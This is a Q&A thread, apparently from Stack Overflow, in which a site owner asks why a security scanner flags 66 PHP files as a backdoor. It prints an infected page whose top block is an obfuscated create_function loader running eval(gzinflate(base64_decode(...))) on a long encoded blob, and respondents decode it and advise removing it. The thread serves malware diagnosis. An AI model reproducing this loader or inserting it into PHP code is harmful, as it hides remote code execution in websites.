# PHP files are infected with SiteLock-PHP-BACKDOOR-GENERIC-co.UNOFFICIAL

Tags: php, linux, hosting, malware, virus

I tested my site for the infection and found that there are 66 files which are php files that are infected but I am really unable to any malicious code into these files, and also don't know how to remove the infection from these files. below is the screenshot of my scan ->

[image]

I checked all these files for the malicious code and also compare it with my old backup but not found any thing suspicious. Also Googled a lot and overflowed stackoverflow with searches but none helped. Please help me out atleast how to trace this virus code.

Here is the code for a single file:

```
    <?php
$md5 = "23423b2hj34j23b4hj23b4jk23bjb4bb34jb";
$aa = array('l','z','v',"s",';',"a",'n',"4",'i',"6",'f',"$",'e',"(",'c',"d",")","o",'b',"t","g",'r',"_");
$ba4 = create_function('$'.'v',$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]);
$ba4('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');
?>
<?php include 'biComposer/start.php' ?>
<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> 
<html class="no-js"> <!--<![endif]-->
  <head>
    <title>Lorem Ipsum is simply dummy text </title>
    <meta name="description" content="" />
    <?php include_partial('meta') ?>
  </head>

  <body>

    <?php include_partial('header', array('caption' => 'about')) ?>

    <section class="main">
      <div class="content">
        <article>
          <h1>about us</h1>
          <h3>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard</h3>
          <p>
            Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
          </p>
          <div class="txt-align-center" style="margin:40px 0;">
            <img src="images/land-acquisition.jpg" alt="">
          </div>
          <p>
           Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has


          </p>
          <div class="txt-align-center" style="margin:40px 0;">
            <img src="images/business-division.jpg" alt="" usemap="#Map">
            <map name="Map">
              <area shape="rect" coords="46,100,200,158">
              <area shape="rect" coords="224,100,380,158">
              <area shape="rect" coords="405,100,555,158">
              <area shape="rect" coords="582,101,732,159">
            </map>
          </div>
        </article>
      </div>
    </section>

    <?php include_partial('footer') ?>

  </body>

 <?php include_partial('js') ?>

</html>
```

Comment: you would have to post the code up for at least some of those pages so we could look at it. though you may be able to google the fingerprint being used for detection and then manually grep the files for that.

Comment: and the first 4 lines of that file don't scream out to you "I SHOULDN'T BE HERE" ?  Delete that php block at the top of that file and then rescan that file I'll bet you it passes scanning then :)

Comment: Big blob of gobbledegook? Sure, all is fine, nothing to see here.

Comment: @Dave yeah it blasted my mind many times but I reassembled it :P somehow but someone else has created these files and now I am re looking into these files after virus found.

Comment: You may find this helpful as it duplicates your issue https://stackoverflow.com/a/45755562/8483413

Answer (score 2, accepted):

So:

```
$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]
```

is actually

```
eval(gzinflate(base64_decode($v)));
```

however if we set `$v` as

```
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
```

I get a `data error` using PHP 5.2.5, and the same happens here: http://sandbox.onlinephpfunctions.com/code/f7fb8d6e35bede9f007b2d77ee87e30957825e0a

Comment: Its a typical method of getting your php code to run unwanted code used by people infecting sites etc.  Your scanner has probably picked up the actual method rather than the contents of $v just delete those lines and any lines that look similar from all your files and you'll be good.  Also check your site for files that shouldn't be there and change your ftp/ssh passwords finally check all your form/upload/login code etc check that it can't be exploited to allow people to inject further code in.

Comment: Thanks @Matteo , I ll make the changes you suggested and get back to you soon.

Comment: Hi, @Matteo that code generated by an application which actually makes that site works, so i cannot delete that code cause it is again automatically generated after delete and after renaming that app folder the site gets down.

Comment: Then you should check how the code is generated to see if there is something wrong there.

Comment: Yes I will check to see where is the problem exactly and I actually downloaded a full site on my ubuntu desktop and scanned with clamav but it didn't detect any virus as the server also has the clamav. what should be the reason.

Comment: thank you for enlightening me. check my answer with a similar solution. https://stackoverflow.com/a/63588072/348589